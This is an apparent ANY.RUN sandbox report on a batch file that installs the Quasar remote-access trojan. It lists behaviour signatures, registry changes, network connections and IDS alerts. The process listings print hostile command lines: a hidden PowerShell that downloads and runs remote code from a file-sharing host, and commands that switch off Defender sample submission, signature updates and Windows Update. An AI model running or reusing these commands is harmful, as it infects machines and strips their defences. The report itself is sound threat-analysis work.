Malware analysis /fl7au0.bat Malicious activity | ANY.RUN

Add for printing

download:	/fl7au0.bat
Full analysis:	https://app.any.run/tasks/96d52a45-6f86-4775-b002-b75125c39ebd
Verdict:	Malicious activity
Threats:	Quasar is a very popular RAT in the world thanks to its code being available in open-source. This malware can be used to control the victim’s computer remotely. Remote access trojans (RATs) are a type of malware that enables attackers to establish complete to partial control over infected computers. Such malicious programs often have a modular design, offering a wide range of functionalities for conducting illicit activities on compromised systems. Some of the most common features of RATs include access to the users’ data, webcam, and keystrokes. This malware is often distributed through phishing emails and links. Malware Trends Tracker >>>
Analysis date:	April 25, 2025, 22:37:19
OS:	Windows 10 Professional (build: 19044, 64 bit)
Tags:	fileshare evasion rat quasar remote api-base64
Indicators:
MIME:	text/plain
File info:	ASCII text, with no line terminators
MD5:	AAD369734D1C31B5CBC03A88C68F2874
SHA1:	DEE14987588B9BF911A4AAA3A0705080ECECE31B
SHA256:	92FB4EB47EB2723E1FE032388930782E4A7097C10E7A39EAB43CECC2C3D545FC
SSDEEP:	3:VSJJLNy1oM3KbQqPJH0cVERAIrFPekW31KRF7MK:sny1R3KbQO0cbrkWkjIK

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

Launch configuration

Task duration:: 300 seconds
Heavy Evasion option:: off
Network geolocation:: off
Additional time used:: 240 seconds
MITM proxy:: off
Privacy:: Public submission
Fakenet option:: off
Route via Tor:: off
Autoconfirmation of UAC:: on
Network:: on

Software preset

Internet Explorer 11.3636.19041.0
Adobe Acrobat (64-bit) (23.001.20093)
Adobe Flash Player 32 NPAPI (32.0.0.465)
Adobe Flash Player 32 PPAPI (32.0.0.465)
CCleaner (6.20)
FileZilla 3.65.0 (3.65.0)
Google Chrome (122.0.6261.70)
Google Update Helper (1.3.36.51)
Java 8 Update 271 (64-bit) (8.0.2710.9)
Java Auto Updater (2.8.271.9)
Microsoft Edge (122.0.2365.59)
Microsoft Edge Update (1.3.185.17)
Microsoft Office Professional 2019 - de-de (16.0.16026.20146)
Microsoft Office Professional 2019 - en-us (16.0.16026.20146)
Microsoft Office Professional 2019 - es-es (16.0.16026.20146)
Microsoft Office Professional 2019 - it-it (16.0.16026.20146)
Microsoft Office Professional 2019 - ja-jp (16.0.16026.20146)
Microsoft Office Professional 2019 - ko-kr (16.0.16026.20146)
Microsoft Office Professional 2019 - pt-br (16.0.16026.20146)
Microsoft Office Professional 2019 - tr-tr (16.0.16026.20146)
Microsoft Office Professionnel 2019 - fr-fr (16.0.16026.20146)
Microsoft Office профессиональный 2019 - ru-ru (16.0.16026.20146)
Microsoft OneNote - en-us (16.0.16026.20146)
Microsoft Update Health Tools (3.74.0.0)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (12.0.30501.0)
Microsoft Visual C++ 2013 x64 Additional Runtime - 12.0.21005 (12.0.21005)
Microsoft Visual C++ 2013 x64 Minimum Runtime - 12.0.21005 (12.0.21005)
Microsoft Visual C++ 2015-2022 Redistributable (x64) - 14.36.32532 (14.36.32532.0)
Microsoft Visual C++ 2015-2022 Redistributable (x86) - 14.36.32532 (14.36.32532.0)
Microsoft Visual C++ 2022 X64 Additional Runtime - 14.36.32532 (14.36.32532)
Microsoft Visual C++ 2022 X64 Minimum Runtime - 14.36.32532 (14.36.32532)
Microsoft Visual C++ 2022 X86 Additional Runtime - 14.36.32532 (14.36.32532)
Microsoft Visual C++ 2022 X86 Minimum Runtime - 14.36.32532 (14.36.32532)
Mozilla Firefox (x64 en-US) (123.0)
Mozilla Maintenance Service (123.0)
Notepad++ (64-bit x64) (7.9.1)
Office 16 Click-to-Run Extensibility Component (16.0.15726.20202)
Office 16 Click-to-Run Licensing Component (16.0.16026.20146)
Office 16 Click-to-Run Localization Component (16.0.15726.20202)
Office 16 Click-to-Run Localization Component (16.0.15928.20198)
PowerShell 7-x64 (7.3.5.0)
Skype version 8.104 (8.104)
Update for Windows 10 for x64-based Systems (KB4023057) (2.59.0.0)
Update for Windows 10 for x64-based Systems (KB4023057) (2.63.0.0)
Update for Windows 10 for x64-based Systems (KB4480730) (2.55.0.0)
Update for Windows 10 for x64-based Systems (KB5001716) (8.93.0.0)
VLC media player (3.0.11)
WinRAR 5.91 (64-bit) (5.91.0)
Windows PC Health Check (3.6.2204.08001)

Hotfixes

Client LanguagePack Package
DotNetRollup
DotNetRollup 481
FodMetadata Package
Foundation Package
Hello Face Package
InternetExplorer Optional Package
KB5003791
KB5011048
KB5015684
KB5033052
LanguageFeatures Basic en us Package
LanguageFeatures Handwriting en us Package
LanguageFeatures OCR en us Package
LanguageFeatures Speech en us Package
LanguageFeatures TextToSpeech en us Package
MSPaint FoD Package
MediaPlayer Package
Microsoft OneCore ApplicationModel Sync Desktop FOD Package
Microsoft OneCore DirectX Database FOD Package
NetFx3 OnDemand Package
Notepad FoD Package
OpenSSH Client Package
PowerShell ISE FOD Package
Printing PMCPPC FoD Package
Printing WFS FoD Package
ProfessionalEdition
QuickAssist Package
RollupFix
ServicingStack
ServicingStack 3989
StepsRecorder Package
TabletPCMath Package
UserExperience Desktop Package
WordPad FoD Package

Add for printing

MALICIOUS
- Bypass execution policy to execute commands
  - powershell.exe (PID: 672)
  - powershell.exe (PID: 4464)
- Run PowerShell with an invisible window
  - powershell.exe (PID: 672)
- Changes powershell execution policy (Bypass)
  - cmd.exe (PID: 976)
  - msiexec.exe (PID: 5064)
- Changes Windows Defender settings
  - cmd.exe (PID: 616)
  - cmd.exe (PID: 3332)
  - cmd.exe (PID: 5136)
- Changes settings for sending potential threat samples to Microsoft servers
  - powershell.exe (PID: 4620)
- Adds path to the Windows Defender exclusion list
  - cmd.exe (PID: 3332)
  - powershell.exe (PID: 4464)
  - cmd.exe (PID: 5136)
  - Launch.exe (PID: 1052)
- Uses Task Scheduler to autorun other applications
  - cmd.exe (PID: 5512)
- Changes the Windows auto-update feature
  - reg.exe (PID: 5772)
  - reg.exe (PID: 2108)
  - reg.exe (PID: 3332)
  - reg.exe (PID: 3124)
  - reg.exe (PID: 2096)
- QUASAR has been detected (SURICATA)
  - communication.exe (PID: 2340)
- Connects to the CnC server
  - communication.exe (PID: 2340)
- Starts REAGENTC.EXE to disable the Windows Recovery Environment
  - ReAgentc.exe (PID: 3796)
SUSPICIOUS
- Starts POWERSHELL.EXE for commands execution
  - cmd.exe (PID: 976)
  - powershell.exe (PID: 672)
  - msiexec.exe (PID: 5064)
  - cmd.exe (PID: 616)
  - cmd.exe (PID: 3332)
  - cmd.exe (PID: 5136)
  - wcm.exe (PID: 6476)
- Possibly malicious use of IEX has been detected
  - cmd.exe (PID: 976)
  - msiexec.exe (PID: 5064)
- Starts CMD.EXE for commands execution
  - powershell.exe (PID: 672)
  - powershell.exe (PID: 4464)
  - Launch.exe (PID: 1052)
  - wcm.exe (PID: 6476)
  - communication.exe (PID: 2340)
- Uses REG/REGEDIT.EXE to modify registry
  - cmd.exe (PID: 664)
  - cmd.exe (PID: 5512)
  - cmd.exe (PID: 5324)
  - cmd.exe (PID: 968)
  - cmd.exe (PID: 928)
  - cmd.exe (PID: 4620)
  - cmd.exe (PID: 5020)
  - cmd.exe (PID: 1912)
  - cmd.exe (PID: 6416)
  - cmd.exe (PID: 728)
  - cmd.exe (PID: 6028)
  - cmd.exe (PID: 6436)
  - cmd.exe (PID: 3300)
  - cmd.exe (PID: 6944)
  - cmd.exe (PID: 960)
  - cmd.exe (PID: 5364)
  - cmd.exe (PID: 6708)
  - cmd.exe (PID: 3140)
- Application launched itself
  - powershell.exe (PID: 672)
- The process bypasses the loading of PowerShell profile settings
  - powershell.exe (PID: 672)
- The process hides Powershell's copyright startup banner
  - powershell.exe (PID: 672)
- Reads the Windows owner or organization settings
  - msiexec.exe (PID: 1676)
- Reads security settings of Internet Explorer
  - msiexec.exe (PID: 1676)
  - msiexec.exe (PID: 5064)
  - Launch.exe (PID: 1052)
  - wcm.exe (PID: 6476)
- Runs shell command (SCRIPT)
  - msiexec.exe (PID: 5064)
- Script adds exclusion path to Windows Defender
  - cmd.exe (PID: 3332)
  - cmd.exe (PID: 5136)
- Found strings related to reading or modifying Windows Defender settings
  - powershell.exe (PID: 4464)
  - wcm.exe (PID: 6476)
- Uses ATTRIB.EXE to modify file attributes
  - powershell.exe (PID: 4464)
- Creates new GUID (POWERSHELL)
  - powershell.exe (PID: 4464)
- Executable content was dropped or overwritten
  - powershell.exe (PID: 4464)
  - Launch.exe (PID: 1052)
  - wcm.exe (PID: 6476)
- Writes data into a file (POWERSHELL)
  - powershell.exe (PID: 4464)
- Reads the date of Windows installation
  - Launch.exe (PID: 1052)
- Creates or modifies Windows services
  - reg.exe (PID: 1168)
- Uses base64 encoding (POWERSHELL)
  - powershell.exe (PID: 4464)
- Probably fake Windows Update
  - cmd.exe (PID: 1040)
  - netsh.exe (PID: 5776)
- The executable file from the user directory is run by the CMD process
  - wcm.exe (PID: 6476)
  - communication.exe (PID: 2340)
- Uses NETSH.EXE to add a firewall rule or allowed programs
  - cmd.exe (PID: 1040)
- Stops a currently running service
  - sc.exe (PID: 2104)
  - sc.exe (PID: 5292)
  - sc.exe (PID: 3012)
  - sc.exe (PID: 4220)
  - sc.exe (PID: 2332)
- Windows service management via SC.EXE
  - sc.exe (PID: 3976)
  - sc.exe (PID: 6068)
  - sc.exe (PID: 2112)
  - sc.exe (PID: 4736)
  - sc.exe (PID: 1812)
- Checks for external IP
  - svchost.exe (PID: 2196)
  - wcm.exe (PID: 6476)
- Modifies existing scheduled task
  - schtasks.exe (PID: 5868)
  - schtasks.exe (PID: 3332)
  - schtasks.exe (PID: 2664)
  - schtasks.exe (PID: 6136)
  - schtasks.exe (PID: 1276)
  - schtasks.exe (PID: 4212)
  - schtasks.exe (PID: 6148)
  - schtasks.exe (PID: 5392)
- Query Microsoft Defender preferences
  - wcm.exe (PID: 6476)
- Contacting a server suspected of hosting an CnC
  - communication.exe (PID: 2340)
- Starts application with an unusual extension
  - cmd.exe (PID: 3332)
- Runs PING.EXE to delay simulation
  - cmd.exe (PID: 3332)
- Connects to unusual port
  - communication.exe (PID: 2340)
- Executing commands from a ".bat" file
  - communication.exe (PID: 2340)
INFO
- Disables trace logs
  - powershell.exe (PID: 672)
  - powershell.exe (PID: 5720)
  - Launch.exe (PID: 1052)
- Checks proxy server information
  - powershell.exe (PID: 672)
  - powershell.exe (PID: 5720)
  - Launch.exe (PID: 1052)
- Reads the computer name
  - msiexec.exe (PID: 1676)
  - msiexec.exe (PID: 5064)
  - Launch.exe (PID: 1052)
  - wcm.exe (PID: 6476)
- Checks supported languages
  - msiexec.exe (PID: 1676)
  - msiexec.exe (PID: 5064)
  - Launch.exe (PID: 1052)
  - wcm.exe (PID: 6476)
- Reads the software policy settings
  - msiexec.exe (PID: 1676)
  - slui.exe (PID: 6800)
  - Launch.exe (PID: 1052)
- Executable content was dropped or overwritten
  - msiexec.exe (PID: 1676)
- Process checks computer location settings
  - msiexec.exe (PID: 5064)
  - Launch.exe (PID: 1052)
  - wcm.exe (PID: 6476)
- Creates a software uninstall entry
  - msiexec.exe (PID: 1676)
- Script raised an exception (POWERSHELL)
  - powershell.exe (PID: 5304)
  - powershell.exe (PID: 4620)
  - powershell.exe (PID: 1180)
- Checks if a key exists in the options dictionary (POWERSHELL)
  - powershell.exe (PID: 5304)
  - powershell.exe (PID: 4620)
  - powershell.exe (PID: 1180)
- Potential remote process memory writing (Base64 Encoded 'WriteProcessMemory')
  - powershell.exe (PID: 4464)
- Potential access to remote process (Base64 Encoded 'OpenProcess')
  - powershell.exe (PID: 4464)
- Potential remote process memory reading (Base64 Encoded 'ReadProcessMemory')
  - powershell.exe (PID: 4464)
- Creates files in the program directory
  - Launch.exe (PID: 1052)
- The executable file from the user directory is run by the Powershell process
  - Launch.exe (PID: 1052)
- Reads Environment values
  - Launch.exe (PID: 1052)
- Reads the machine GUID from the registry
  - Launch.exe (PID: 1052)
  - wcm.exe (PID: 6476)
- Creates files or folders in the user directory
  - Launch.exe (PID: 1052)
- Changes the display of characters in the console
  - cmd.exe (PID: 3332)

Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

Add for printing

No Malware configuration.

Add for printing

No data.

Add for printing

All screenshots are available in the full report

Add for printing

Total processes

301

Monitored processes

170

Malicious processes

Suspicious processes

Behavior graph

Click at the process to see the details

Process information

PID

CMD

Path

Indicators

Parent process

232

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate" /v "DisableWindowsUpdateAccess" /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\reg.exe

—

cmd.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

HIGH

Description:

Registry Console Tool

Exit code:

Version:

10.0.19041.1 (WinBuild.160101.0800)

Modules

Images
c:\windows\syswow64\reg.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\advapi32.dll

232

\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\conhost.exe

—

cmd.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

HIGH

Description:

Console Window Host

Exit code:

Version:

10.0.19041.1 (WinBuild.160101.0800)

Modules

Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll

616

"C:\WINDOWS\system32\cmd.exe" /c powershell -Command "Set-MpPreference -SubmitSamplesConsent NeverSend"

C:\Windows\SysWOW64\cmd.exe

—

powershell.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

HIGH

Description:

Windows Command Processor

Exit code:

Version:

10.0.19041.3636 (WinBuild.160101.0800)

Modules

Images
c:\windows\syswow64\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\combase.dll

664

"C:\WINDOWS\system32\cmd.exe" /c reg add "HKCU\Software\Microsoft" /v "App" /t REG_SZ /d crypto /f

C:\Windows\System32\cmd.exe

—

powershell.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

MEDIUM

Description:

Windows Command Processor

Exit code:

Version:

10.0.19041.1 (WinBuild.160101.0800)

Modules

Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\sechost.dll
c:\windows\system32\bcrypt.dll

668

\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\conhost.exe

—

cmd.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

HIGH

Description:

Console Window Host

Exit code:

Version:

10.0.19041.1 (WinBuild.160101.0800)

Modules

Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll

672

powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Command "irm https://files.catbox.moe/rhdvpe.txt | iex"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

cmd.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

MEDIUM

Description:

Windows PowerShell

Exit code:

Version:

10.0.19041.1 (WinBuild.160101.0800)

Modules

Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll

680

"C:\Windows\SysWOW64\cmd.exe" /c "schtasks /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /Disable"

C:\Windows\SysWOW64\cmd.exe

—

wcm.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

HIGH

Description:

Windows Command Processor

Exit code:

Version:

10.0.19041.3636 (WinBuild.160101.0800)

Modules

Images
c:\windows\syswow64\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\combase.dll

684

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate" /v "NoUpdates" /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\reg.exe

—

cmd.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

HIGH

Description:

Registry Console Tool

Exit code:

Version:

10.0.19041.1 (WinBuild.160101.0800)

Modules

Images
c:\windows\syswow64\reg.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\advapi32.dll

728

"C:\WINDOWS\system32\attrib.exe" +H +S C:\Users\admin\AppData\Local\b8c149db0a\Launch.exe

C:\Windows\SysWOW64\attrib.exe

—

powershell.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

HIGH

Description:

Attribute Utility

Exit code:

Version:

10.0.19041.1 (WinBuild.160101.0800)

Modules

Images
c:\windows\syswow64\attrib.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\ulib.dll

728

"C:\Windows\SysWOW64\cmd.exe" /c "REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v "DisableUpdate" /t REG_DWORD /d 1 /f"

C:\Windows\SysWOW64\cmd.exe

—

wcm.exe

User:

admin

Company:

Microsoft Corporation

Integrity Level:

HIGH

Description:

Windows Command Processor

Exit code:

Version:

10.0.19041.3636 (WinBuild.160101.0800)

Modules

Images
c:\windows\syswow64\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\combase.dll

Add for printing

Total events

52 941

Read events

52 694

Write events

169

Delete events

Modification events


(PID) Process:	(672) powershell.exe	Key:	HKEY_CURRENT_USER\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell
Operation:	write	Name:	ExecutionPolicy
Value: Bypass
(PID) Process:	(5512) reg.exe	Key:	HKEY_CURRENT_USER\SOFTWARE\Microsoft
Operation:	write	Name:	App
Value: crypto
(PID) Process:	(7144) reg.exe	Key:	HKEY_CURRENT_USER\SOFTWARE\Microsoft
Operation:	write	Name:	Application
Value: Yes
(PID) Process:	(1676) msiexec.exe	Key:	HKEY_USERS\S-1-5-21-1693682860-607145093-2874071422-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:	write	Name:	ProxyBypass
Value: 1
(PID) Process:	(1676) msiexec.exe	Key:	HKEY_USERS\S-1-5-21-1693682860-607145093-2874071422-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:	write	Name:	IntranetName
Value: 1
(PID) Process:	(1676) msiexec.exe	Key:	HKEY_USERS\S-1-5-21-1693682860-607145093-2874071422-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:	write	Name:	UNCAsIntranet
Value: 1
(PID) Process:	(1676) msiexec.exe	Key:	HKEY_USERS\S-1-5-21-1693682860-607145093-2874071422-1001\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:	write	Name:	AutoDetect
Value: 0
(PID) Process:	(1676) msiexec.exe	Key:	HKEY_USERS\S-1-5-21-1693682860-607145093-2874071422-1001\SOFTWARE\Microsoft\RestartManager\Session0000
Operation:	write	Name:	Owner
Value: 8C060000447462A632B6DB01
(PID) Process:	(1676) msiexec.exe	Key:	HKEY_USERS\S-1-5-21-1693682860-607145093-2874071422-1001\SOFTWARE\Microsoft\RestartManager\Session0000
Operation:	write	Name:	SessionHash
Value: B6A1255890788AC8D5D2B042F1D001CFA55842BF605E8864AB0B4AED1F9D45DF
(PID) Process:	(1676) msiexec.exe	Key:	HKEY_USERS\S-1-5-21-1693682860-607145093-2874071422-1001\SOFTWARE\Microsoft\RestartManager\Session0000
Operation:	write	Name:	Sequence
Value: 1

Add for printing

Executable files

Suspicious files

Text files

Unknown types

Dropped files

PID	Process	Filename		Type
672	powershell.exe	C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_1uzrpje0.hd1.ps1		text
		MD5:D17FE0A3F47BE24A6453E9EF58C94641	SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
1676	msiexec.exe	C:\Windows\Temp\~DFB928440C416CE01E.TMP		binary
		MD5:9C671E984D23078DAD6532020FB230D2	SHA256:1D6F154894394FA6A67EB7FF1ED9288EFEFD2DB7889D0E8EB54BE110D9F6922E
5720	powershell.exe	C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_4tjbtf3m.vx2.ps1		text
		MD5:D17FE0A3F47BE24A6453E9EF58C94641	SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
1676	msiexec.exe	C:\Windows\Temp\~DF95A5728A0F0CDADF.TMP		binary
		MD5:9C671E984D23078DAD6532020FB230D2	SHA256:1D6F154894394FA6A67EB7FF1ED9288EFEFD2DB7889D0E8EB54BE110D9F6922E
1676	msiexec.exe	C:\Windows\Installer\10efc3.msi		executable
		MD5:59780432D9DB16BABEBD9820D19DE195	SHA256:A7BE54E489CBFE0E95CB873C8858E99FF2E27CDCD2337084D0BFB13AF9441766
1676	msiexec.exe	C:\Windows\Temp\~DFA795024202802366.TMP		binary
		MD5:9C671E984D23078DAD6532020FB230D2	SHA256:1D6F154894394FA6A67EB7FF1ED9288EFEFD2DB7889D0E8EB54BE110D9F6922E
1676	msiexec.exe	C:\Windows\Temp\~DF58EA2C83964A7138.TMP		binary
		MD5:BF619EAC0CDF3F68D496EA9344137E8B	SHA256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
1676	msiexec.exe	C:\Config.Msi\10efc2.rbs		binary
		MD5:C97C2CBF04298118A49018131E2426AC	SHA256:3B8BC9A6494111A128664E4D5FF2CA3F6B8CF63B2EB6C14AFEBBA0B4D7CA4924
1676	msiexec.exe	C:\Windows\Temp\~DFAB24D78D6FA01903.TMP		binary
		MD5:BF619EAC0CDF3F68D496EA9344137E8B	SHA256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
1676	msiexec.exe	C:\Windows\Installer\MSIEFE1.tmp		binary
		MD5:D8851E940869A3865A80A7759ACA7DB2	SHA256:C38247710B6B18ACB9FF798F9ABB7631507E06E27DD2B0C778EB0A99627634DB

Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Add for printing

HTTP(S) requests

TCP/UDP connections

100

DNS requests

Threats

HTTP requests

PID	Process	Method	HTTP Code	IP	URL	CN	Type	Size	Reputation
2104	svchost.exe	GET	200	2.16.168.124:80	http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl	unknown	—	—	whitelisted
5496	MoUsoCoreWorker.exe	GET	200	184.30.21.171:80	http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl	unknown	—	—	whitelisted
2104	svchost.exe	GET	200	184.30.21.171:80	http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl	unknown	—	—	whitelisted
4108	SIHClient.exe	GET	200	184.30.21.171:80	http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl	unknown	—	—	whitelisted
6544	svchost.exe	GET	200	184.30.131.245:80	http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D	unknown	—	—	whitelisted
4108	SIHClient.exe	GET	200	184.30.21.171:80	http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl	unknown	—	—	whitelisted
—	—	GET	200	184.30.21.171:80	http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl	unknown	—	—	whitelisted
5496	MoUsoCoreWorker.exe	GET	200	2.16.168.124:80	http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl	unknown	—	—	whitelisted

Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID	Process	IP	Domain	ASN	CN	Reputation
—	—	51.124.78.146:443	settings-win.data.microsoft.com	MICROSOFT-CORP-MSN-AS-BLOCK	NL	whitelisted
4	System	192.168.100.255:137	—	—	—	whitelisted
4	System	192.168.100.255:138	—	—	—	whitelisted
2104	svchost.exe	2.16.168.124:80	crl.microsoft.com	Akamai International B.V.	RU	whitelisted
5496	MoUsoCoreWorker.exe	2.16.168.124:80	crl.microsoft.com	Akamai International B.V.	RU	whitelisted
2104	svchost.exe	184.30.21.171:80	www.microsoft.com	AKAMAI-AS	DE	whitelisted
5496	MoUsoCoreWorker.exe	184.30.21.171:80	www.microsoft.com	AKAMAI-AS	DE	whitelisted
—	—	184.30.21.171:80	www.microsoft.com	AKAMAI-AS	DE	whitelisted
672	powershell.exe	108.181.20.35:443	files.catbox.moe	TELUS Communications	CA	malicious
3216	svchost.exe	172.211.123.250:443	client.wns.windows.com	MICROSOFT-CORP-MSN-AS-BLOCK	FR	whitelisted

DNS requests

Domain	IP	Reputation
settings-win.data.microsoft.com	51.124.78.146 51.104.136.2	whitelisted
crl.microsoft.com	2.16.168.124 2.16.168.114	whitelisted
www.microsoft.com	184.30.21.171	whitelisted
google.com	142.250.184.238	whitelisted
files.catbox.moe	108.181.20.35	malicious
client.wns.windows.com	172.211.123.250	whitelisted
login.live.com	40.126.32.136 20.190.160.5 40.126.32.72 20.190.160.20 40.126.32.74 40.126.32.68 20.190.160.17 20.190.160.14 40.126.31.131 20.190.159.128 20.190.159.4 40.126.31.130 20.190.159.68 40.126.31.71 20.190.159.64 20.190.159.73	whitelisted
ocsp.digicert.com	184.30.131.245	whitelisted
myaunet.su	107.189.21.90	unknown
slscr.update.microsoft.com	20.12.23.50	whitelisted

Threats

PID	Process	Class	Message
672	powershell.exe	Potentially Bad Traffic	ET INFO Observed File Sharing Service Download Domain (files .catbox .moe in TLS SNI)
672	powershell.exe	Not Suspicious Traffic	INFO [ANY.RUN] Downloading from a file sharing service is observed
2196	svchost.exe	Misc activity	ET INFO External IP Lookup Domain (ipify .org) in DNS Lookup
6476	wcm.exe	Misc activity	ET INFO External IP Address Lookup Domain (ipify .org) in TLS SNI
2196	svchost.exe	Potentially Bad Traffic	ET INFO External IP Lookup Domain in DNS Lookup (ipwho .is)
2340	communication.exe	Domain Observed Used for C2 Detected	ET MALWARE Generic AsyncRAT/zgRAT Style SSL Cert
2340	communication.exe	Misc Attack	ET DROP Spamhaus DROP Listed Traffic Inbound group 30
2340	communication.exe	Domain Observed Used for C2 Detected	ET MALWARE Observed Malicious SSL Cert (Quasar CnC)
2340	communication.exe	Malware Command and Control Activity Detected	REMOTE [ANY.RUN] QuasarRAT Successful Connection (GCM_SHA384)

Add for printing

No debug info

General Info

/fl7au0.bat

AAD369734D1C31B5CBC03A88C68F2874

DEE14987588B9BF911A4AAA3A0705080ECECE31B

92FB4EB47EB2723E1FE032388930782E4A7097C10E7A39EAB43CECC2C3D545FC

3:VSJJLNy1oM3KbQqPJH0cVERAIrFPekW31KRF7MK:sny1R3KbQO0cbrkWkjIK

Software environment set and analysis options

Launch configuration

Software preset

Hotfixes

Behavior activities

MALICIOUS

Bypass execution policy to execute commands

Run PowerShell with an invisible window

Changes powershell execution policy (Bypass)

Changes Windows Defender settings

Changes settings for sending potential threat samples to Microsoft servers

Adds path to the Windows Defender exclusion list

Uses Task Scheduler to autorun other applications

Changes the Windows auto-update feature

QUASAR has been detected (SURICATA)

Connects to the CnC server

